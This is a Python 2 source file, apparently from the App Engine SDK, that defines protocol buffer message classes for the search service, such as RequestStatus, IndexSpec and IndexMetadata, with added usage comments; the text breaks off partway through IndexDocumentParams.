from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
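# Generated-style protocol buffer bindings for the apphosting search service
# (SearchServiceError, RequestStatus, IndexSpec, IndexMetadata, and the
# Index/Delete/ListDocuments request and response messages below), written
# against the legacy google.net.proto.ProtocolBuffer runtime used by the
# Python 2 App Engine SDK.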
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
_extension_runtime = True
_ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
_extension_runtime = False
_ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage
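# Detect whether this ProtocolBuffer runtime supports proto2 extensions;
# when it does not, _ExtendableProtocolMessage falls back to the plain
# ProtocolMessage base class and _extension_runtime stays False.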
from google.appengine.datastore.document_pb import *
import google.appengine.datastore.document_pb
class SearchServiceError(ProtocolBuffer.ProtocolMessage):
OK = 0
INVALID_REQUEST = 1
TRANSIENT_ERROR = 2
INTERNAL_ERROR = 3
PERMISSION_DENIED = 4
TIMEOUT = 5
CONCURRENT_TRANSACTION = 6
_ErrorCode_NAMES = {
0: "OK",
1: "INVALID_REQUEST",
2: "TRANSIENT_ERROR",
3: "INTERNAL_ERROR",
4: "PERMISSION_DENIED",
5: "TIMEOUT",
6: "CONCURRENT_TRANSACTION",
}
def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
ErrorCode_Name = classmethod(ErrorCode_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchServiceError'
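# SearchServiceError carries no fields of its own; it exists to scope the
# ErrorCode enum (OK, INVALID_REQUEST, ...) whose values RequestStatus.code
# is expected to hold.  A minimal usage sketch:
#
#   assert SearchServiceError.ErrorCode_Name(SearchServiceError.TIMEOUT) == "TIMEOUT"
#   assert SearchServiceError.ErrorCode_Name(99) == ""   # unknown values map to ""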
class RequestStatus(ProtocolBuffer.ProtocolMessage):
has_code_ = 0
code_ = 0
has_error_detail_ = 0
error_detail_ = ""
has_canonical_code_ = 0
canonical_code_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def code(self): return self.code_
def set_code(self, x):
self.has_code_ = 1
self.code_ = x
def clear_code(self):
if self.has_code_:
self.has_code_ = 0
self.code_ = 0
def has_code(self): return self.has_code_
def error_detail(self): return self.error_detail_
def set_error_detail(self, x):
self.has_error_detail_ = 1
self.error_detail_ = x
def clear_error_detail(self):
if self.has_error_detail_:
self.has_error_detail_ = 0
self.error_detail_ = ""
def has_error_detail(self): return self.has_error_detail_
def canonical_code(self): return self.canonical_code_
def set_canonical_code(self, x):
self.has_canonical_code_ = 1
self.canonical_code_ = x
def clear_canonical_code(self):
if self.has_canonical_code_:
self.has_canonical_code_ = 0
self.canonical_code_ = 0
def has_canonical_code(self): return self.has_canonical_code_
def MergeFrom(self, x):
assert x is not self
if (x.has_code()): self.set_code(x.code())
if (x.has_error_detail()): self.set_error_detail(x.error_detail())
if (x.has_canonical_code()): self.set_canonical_code(x.canonical_code())
def Equals(self, x):
if x is self: return 1
if self.has_code_ != x.has_code_: return 0
if self.has_code_ and self.code_ != x.code_: return 0
if self.has_error_detail_ != x.has_error_detail_: return 0
if self.has_error_detail_ and self.error_detail_ != x.error_detail_: return 0
if self.has_canonical_code_ != x.has_canonical_code_: return 0
if self.has_canonical_code_ and self.canonical_code_ != x.canonical_code_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_code_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: code not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthVarInt64(self.code_)
if (self.has_error_detail_): n += 1 + self.lengthString(len(self.error_detail_))
if (self.has_canonical_code_): n += 1 + self.lengthVarInt64(self.canonical_code_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_code_):
n += 1
n += self.lengthVarInt64(self.code_)
if (self.has_error_detail_): n += 1 + self.lengthString(len(self.error_detail_))
if (self.has_canonical_code_): n += 1 + self.lengthVarInt64(self.canonical_code_)
return n
def Clear(self):
self.clear_code()
self.clear_error_detail()
self.clear_canonical_code()
def OutputUnchecked(self, out):
out.putVarInt32(8)
out.putVarInt32(self.code_)
if (self.has_error_detail_):
out.putVarInt32(18)
out.putPrefixedString(self.error_detail_)
if (self.has_canonical_code_):
out.putVarInt32(24)
out.putVarInt32(self.canonical_code_)
def OutputPartial(self, out):
if (self.has_code_):
out.putVarInt32(8)
out.putVarInt32(self.code_)
if (self.has_error_detail_):
out.putVarInt32(18)
out.putPrefixedString(self.error_detail_)
if (self.has_canonical_code_):
out.putVarInt32(24)
out.putVarInt32(self.canonical_code_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_code(d.getVarInt32())
continue
if tt == 18:
self.set_error_detail(d.getPrefixedString())
continue
if tt == 24:
self.set_canonical_code(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_code_: res+=prefix+("code: %s\n" % self.DebugFormatInt32(self.code_))
if self.has_error_detail_: res+=prefix+("error_detail: %s\n" % self.DebugFormatString(self.error_detail_))
if self.has_canonical_code_: res+=prefix+("canonical_code: %s\n" % self.DebugFormatInt32(self.canonical_code_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kcode = 1
kerror_detail = 2
kcanonical_code = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "code",
2: "error_detail",
3: "canonical_code",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.RequestStatus'
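# Sketch of building a RequestStatus by hand with the accessors defined above
# (the values are illustrative, not taken from a real response):
#
#   status = RequestStatus()
#   status.set_code(SearchServiceError.TRANSIENT_ERROR)
#   status.set_error_detail('backend unavailable')
#   assert status.IsInitialized()          # code is the only required field
#   print status                           # text form via __str__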
class IndexSpec(ProtocolBuffer.ProtocolMessage):
GLOBAL = 0
PER_DOCUMENT = 1
_Consistency_NAMES = {
0: "GLOBAL",
1: "PER_DOCUMENT",
}
def Consistency_Name(cls, x): return cls._Consistency_NAMES.get(x, "")
Consistency_Name = classmethod(Consistency_Name)
SEARCH = 0
DATASTORE = 1
CLOUD_STORAGE = 2
_Source_NAMES = {
0: "SEARCH",
1: "DATASTORE",
2: "CLOUD_STORAGE",
}
def Source_Name(cls, x): return cls._Source_NAMES.get(x, "")
Source_Name = classmethod(Source_Name)
PRIORITY = 0
BACKGROUND = 1
_Mode_NAMES = {
0: "PRIORITY",
1: "BACKGROUND",
}
def Mode_Name(cls, x): return cls._Mode_NAMES.get(x, "")
Mode_Name = classmethod(Mode_Name)
has_name_ = 0
name_ = ""
has_consistency_ = 0
consistency_ = 1
has_namespace_ = 0
namespace_ = ""
has_version_ = 0
version_ = 0
has_source_ = 0
source_ = 0
has_mode_ = 0
mode_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def consistency(self): return self.consistency_
def set_consistency(self, x):
self.has_consistency_ = 1
self.consistency_ = x
def clear_consistency(self):
if self.has_consistency_:
self.has_consistency_ = 0
self.consistency_ = 1
def has_consistency(self): return self.has_consistency_
def namespace(self): return self.namespace_
def set_namespace(self, x):
self.has_namespace_ = 1
self.namespace_ = x
def clear_namespace(self):
if self.has_namespace_:
self.has_namespace_ = 0
self.namespace_ = ""
def has_namespace(self): return self.has_namespace_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = 0
def has_version(self): return self.has_version_
def source(self): return self.source_
def set_source(self, x):
self.has_source_ = 1
self.source_ = x
def clear_source(self):
if self.has_source_:
self.has_source_ = 0
self.source_ = 0
def has_source(self): return self.has_source_
def mode(self): return self.mode_
def set_mode(self, x):
self.has_mode_ = 1
self.mode_ = x
def clear_mode(self):
if self.has_mode_:
self.has_mode_ = 0
self.mode_ = 0
def has_mode(self): return self.has_mode_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_consistency()): self.set_consistency(x.consistency())
if (x.has_namespace()): self.set_namespace(x.namespace())
if (x.has_version()): self.set_version(x.version())
if (x.has_source()): self.set_source(x.source())
if (x.has_mode()): self.set_mode(x.mode())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_consistency_ != x.has_consistency_: return 0
if self.has_consistency_ and self.consistency_ != x.consistency_: return 0
if self.has_namespace_ != x.has_namespace_: return 0
if self.has_namespace_ and self.namespace_ != x.namespace_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
if self.has_source_ != x.has_source_: return 0
if self.has_source_ and self.source_ != x.source_: return 0
if self.has_mode_ != x.has_mode_: return 0
if self.has_mode_ and self.mode_ != x.mode_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
if (self.has_consistency_): n += 1 + self.lengthVarInt64(self.consistency_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
if (self.has_mode_): n += 1 + self.lengthVarInt64(self.mode_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_consistency_): n += 1 + self.lengthVarInt64(self.consistency_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
if (self.has_mode_): n += 1 + self.lengthVarInt64(self.mode_)
return n
def Clear(self):
self.clear_name()
self.clear_consistency()
self.clear_namespace()
self.clear_version()
self.clear_source()
self.clear_mode()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_consistency_):
out.putVarInt32(16)
out.putVarInt32(self.consistency_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_version_):
out.putVarInt32(32)
out.putVarInt32(self.version_)
if (self.has_source_):
out.putVarInt32(40)
out.putVarInt32(self.source_)
if (self.has_mode_):
out.putVarInt32(48)
out.putVarInt32(self.mode_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_consistency_):
out.putVarInt32(16)
out.putVarInt32(self.consistency_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_version_):
out.putVarInt32(32)
out.putVarInt32(self.version_)
if (self.has_source_):
out.putVarInt32(40)
out.putVarInt32(self.source_)
if (self.has_mode_):
out.putVarInt32(48)
out.putVarInt32(self.mode_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 16:
self.set_consistency(d.getVarInt32())
continue
if tt == 26:
self.set_namespace(d.getPrefixedString())
continue
if tt == 32:
self.set_version(d.getVarInt32())
continue
if tt == 40:
self.set_source(d.getVarInt32())
continue
if tt == 48:
self.set_mode(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_consistency_: res+=prefix+("consistency: %s\n" % self.DebugFormatInt32(self.consistency_))
if self.has_namespace_: res+=prefix+("namespace: %s\n" % self.DebugFormatString(self.namespace_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatInt32(self.version_))
if self.has_source_: res+=prefix+("source: %s\n" % self.DebugFormatInt32(self.source_))
if self.has_mode_: res+=prefix+("mode: %s\n" % self.DebugFormatInt32(self.mode_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kconsistency = 2
knamespace = 3
kversion = 4
ksource = 5
kmode = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "consistency",
3: "namespace",
4: "version",
5: "source",
6: "mode",
}, 6)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
}, 6, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexSpec'
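# Sketch of populating an IndexSpec; only name is required (see IsInitialized),
# and the remaining fields default to the class-level values above.  The index
# and namespace names here are made up for illustration:
#
#   spec = IndexSpec()
#   spec.set_name('products')
#   spec.set_namespace('default')
#   spec.set_consistency(IndexSpec.PER_DOCUMENT)
#   spec.set_source(IndexSpec.SEARCH)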
class IndexMetadata_Storage(ProtocolBuffer.ProtocolMessage):
has_amount_used_ = 0
amount_used_ = 0
has_limit_ = 0
limit_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def amount_used(self): return self.amount_used_
def set_amount_used(self, x):
self.has_amount_used_ = 1
self.amount_used_ = x
def clear_amount_used(self):
if self.has_amount_used_:
self.has_amount_used_ = 0
self.amount_used_ = 0
def has_amount_used(self): return self.has_amount_used_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 0
def has_limit(self): return self.has_limit_
def MergeFrom(self, x):
assert x is not self
if (x.has_amount_used()): self.set_amount_used(x.amount_used())
if (x.has_limit()): self.set_limit(x.limit())
def Equals(self, x):
if x is self: return 1
if self.has_amount_used_ != x.has_amount_used_: return 0
if self.has_amount_used_ and self.amount_used_ != x.amount_used_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_amount_used_): n += 1 + self.lengthVarInt64(self.amount_used_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
return n
def ByteSizePartial(self):
n = 0
if (self.has_amount_used_): n += 1 + self.lengthVarInt64(self.amount_used_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
return n
def Clear(self):
self.clear_amount_used()
self.clear_limit()
def OutputUnchecked(self, out):
if (self.has_amount_used_):
out.putVarInt32(8)
out.putVarInt64(self.amount_used_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt64(self.limit_)
def OutputPartial(self, out):
if (self.has_amount_used_):
out.putVarInt32(8)
out.putVarInt64(self.amount_used_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt64(self.limit_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_amount_used(d.getVarInt64())
continue
if tt == 16:
self.set_limit(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_amount_used_: res+=prefix+("amount_used: %s\n" % self.DebugFormatInt64(self.amount_used_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt64(self.limit_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kamount_used = 1
klimit = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "amount_used",
2: "limit",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexMetadata_Storage'
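# IndexMetadata_Storage is a small optional sub-message reporting storage
# usage for an index: amount_used and limit, both varint64 fields with no
# required members.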
class IndexMetadata(ProtocolBuffer.ProtocolMessage):
ACTIVE = 0
SOFT_DELETED = 1
PURGING = 2
_IndexState_NAMES = {
0: "ACTIVE",
1: "SOFT_DELETED",
2: "PURGING",
}
def IndexState_Name(cls, x): return cls._IndexState_NAMES.get(x, "")
IndexState_Name = classmethod(IndexState_Name)
has_index_spec_ = 0
has_storage_ = 0
storage_ = None
has_index_state_ = 0
index_state_ = 0
has_index_delete_time_ = 0
index_delete_time_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
self.field_ = []
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def field_size(self): return len(self.field_)
def field_list(self): return self.field_
def field(self, i):
return self.field_[i]
def mutable_field(self, i):
return self.field_[i]
def add_field(self):
x = FieldTypes()
self.field_.append(x)
return x
def clear_field(self):
self.field_ = []
def storage(self):
if self.storage_ is None:
self.lazy_init_lock_.acquire()
try:
if self.storage_ is None: self.storage_ = IndexMetadata_Storage()
finally:
self.lazy_init_lock_.release()
return self.storage_
def mutable_storage(self): self.has_storage_ = 1; return self.storage()
def clear_storage(self):
if self.has_storage_:
self.has_storage_ = 0;
if self.storage_ is not None: self.storage_.Clear()
def has_storage(self): return self.has_storage_
def index_state(self): return self.index_state_
def set_index_state(self, x):
self.has_index_state_ = 1
self.index_state_ = x
def clear_index_state(self):
if self.has_index_state_:
self.has_index_state_ = 0
self.index_state_ = 0
def has_index_state(self): return self.has_index_state_
def index_delete_time(self): return self.index_delete_time_
def set_index_delete_time(self, x):
self.has_index_delete_time_ = 1
self.index_delete_time_ = x
def clear_index_delete_time(self):
if self.has_index_delete_time_:
self.has_index_delete_time_ = 0
self.index_delete_time_ = 0
def has_index_delete_time(self): return self.has_index_delete_time_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
for i in xrange(x.field_size()): self.add_field().CopyFrom(x.field(i))
if (x.has_storage()): self.mutable_storage().MergeFrom(x.storage())
if (x.has_index_state()): self.set_index_state(x.index_state())
if (x.has_index_delete_time()): self.set_index_delete_time(x.index_delete_time())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
if len(self.field_) != len(x.field_): return 0
for e1, e2 in zip(self.field_, x.field_):
if e1 != e2: return 0
if self.has_storage_ != x.has_storage_: return 0
if self.has_storage_ and self.storage_ != x.storage_: return 0
if self.has_index_state_ != x.has_index_state_: return 0
if self.has_index_state_ and self.index_state_ != x.index_state_: return 0
if self.has_index_delete_time_ != x.has_index_delete_time_: return 0
if self.has_index_delete_time_ and self.index_delete_time_ != x.index_delete_time_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
for p in self.field_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_storage_ and not self.storage_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
n += 1 * len(self.field_)
for i in xrange(len(self.field_)): n += self.lengthString(self.field_[i].ByteSize())
if (self.has_storage_): n += 1 + self.lengthString(self.storage_.ByteSize())
if (self.has_index_state_): n += 1 + self.lengthVarInt64(self.index_state_)
if (self.has_index_delete_time_): n += 1 + self.lengthVarInt64(self.index_delete_time_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
n += 1 * len(self.field_)
for i in xrange(len(self.field_)): n += self.lengthString(self.field_[i].ByteSizePartial())
if (self.has_storage_): n += 1 + self.lengthString(self.storage_.ByteSizePartial())
if (self.has_index_state_): n += 1 + self.lengthVarInt64(self.index_state_)
if (self.has_index_delete_time_): n += 1 + self.lengthVarInt64(self.index_delete_time_)
return n
def Clear(self):
self.clear_index_spec()
self.clear_field()
self.clear_storage()
self.clear_index_state()
self.clear_index_delete_time()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
for i in xrange(len(self.field_)):
out.putVarInt32(18)
out.putVarInt32(self.field_[i].ByteSize())
self.field_[i].OutputUnchecked(out)
if (self.has_storage_):
out.putVarInt32(26)
out.putVarInt32(self.storage_.ByteSize())
self.storage_.OutputUnchecked(out)
if (self.has_index_state_):
out.putVarInt32(32)
out.putVarInt32(self.index_state_)
if (self.has_index_delete_time_):
out.putVarInt32(40)
out.putVarInt64(self.index_delete_time_)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
for i in xrange(len(self.field_)):
out.putVarInt32(18)
out.putVarInt32(self.field_[i].ByteSizePartial())
self.field_[i].OutputPartial(out)
if (self.has_storage_):
out.putVarInt32(26)
out.putVarInt32(self.storage_.ByteSizePartial())
self.storage_.OutputPartial(out)
if (self.has_index_state_):
out.putVarInt32(32)
out.putVarInt32(self.index_state_)
if (self.has_index_delete_time_):
out.putVarInt32(40)
out.putVarInt64(self.index_delete_time_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_field().TryMerge(tmp)
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_storage().TryMerge(tmp)
continue
if tt == 32:
self.set_index_state(d.getVarInt32())
continue
if tt == 40:
self.set_index_delete_time(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.field_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("field%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_storage_:
res+=prefix+"storage <\n"
res+=self.storage_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_index_state_: res+=prefix+("index_state: %s\n" % self.DebugFormatInt32(self.index_state_))
if self.has_index_delete_time_: res+=prefix+("index_delete_time: %s\n" % self.DebugFormatInt64(self.index_delete_time_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
kfield = 2
kstorage = 3
kindex_state = 4
kindex_delete_time = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
2: "field",
3: "storage",
4: "index_state",
5: "index_delete_time",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexMetadata'
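# Sketch of assembling an IndexMetadata record; index_spec is the only
# required field.  add_field() appends a FieldTypes message, presumably
# provided by the document_pb wildcard import above.  Values are illustrative:
#
#   md = IndexMetadata()
#   md.mutable_index_spec().set_name('products')
#   md.set_index_state(IndexMetadata.ACTIVE)
#   md.mutable_storage().set_limit(1024 * 1024)
#   assert md.IsInitialized()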
class IndexDocumentParams(ProtocolBuffer.ProtocolMessage):
SYNCHRONOUSLY = 0
WHEN_CONVENIENT = 1
_Freshness_NAMES = {
0: "SYNCHRONOUSLY",
1: "WHEN_CONVENIENT",
}
def Freshness_Name(cls, x): return cls._Freshness_NAMES.get(x, "")
Freshness_Name = classmethod(Freshness_Name)
has_freshness_ = 0
freshness_ = 0
has_index_spec_ = 0
def __init__(self, contents=None):
self.document_ = []
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def document_size(self): return len(self.document_)
def document_list(self): return self.document_
def document(self, i):
return self.document_[i]
def mutable_document(self, i):
return self.document_[i]
def add_document(self):
x = Document()
self.document_.append(x)
return x
def clear_document(self):
self.document_ = []
def freshness(self): return self.freshness_
def set_freshness(self, x):
self.has_freshness_ = 1
self.freshness_ = x
def clear_freshness(self):
if self.has_freshness_:
self.has_freshness_ = 0
self.freshness_ = 0
def has_freshness(self): return self.has_freshness_
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.document_size()): self.add_document().CopyFrom(x.document(i))
if (x.has_freshness()): self.set_freshness(x.freshness())
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if len(self.document_) != len(x.document_): return 0
for e1, e2 in zip(self.document_, x.document_):
if e1 != e2: return 0
if self.has_freshness_ != x.has_freshness_: return 0
if self.has_freshness_ and self.freshness_ != x.freshness_: return 0
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.document_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSize())
if (self.has_freshness_): n += 1 + self.lengthVarInt64(self.freshness_)
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSizePartial())
if (self.has_freshness_): n += 1 + self.lengthVarInt64(self.freshness_)
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_document()
self.clear_freshness()
self.clear_index_spec()
def OutputUnchecked(self, out):
for i in xrange(len(self.document_)):
out.putVarInt32(10)
out.putVarInt32(self.document_[i].ByteSize())
self.document_[i].OutputUnchecked(out)
if (self.has_freshness_):
out.putVarInt32(16)
out.putVarInt32(self.freshness_)
out.putVarInt32(26)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.document_)):
out.putVarInt32(10)
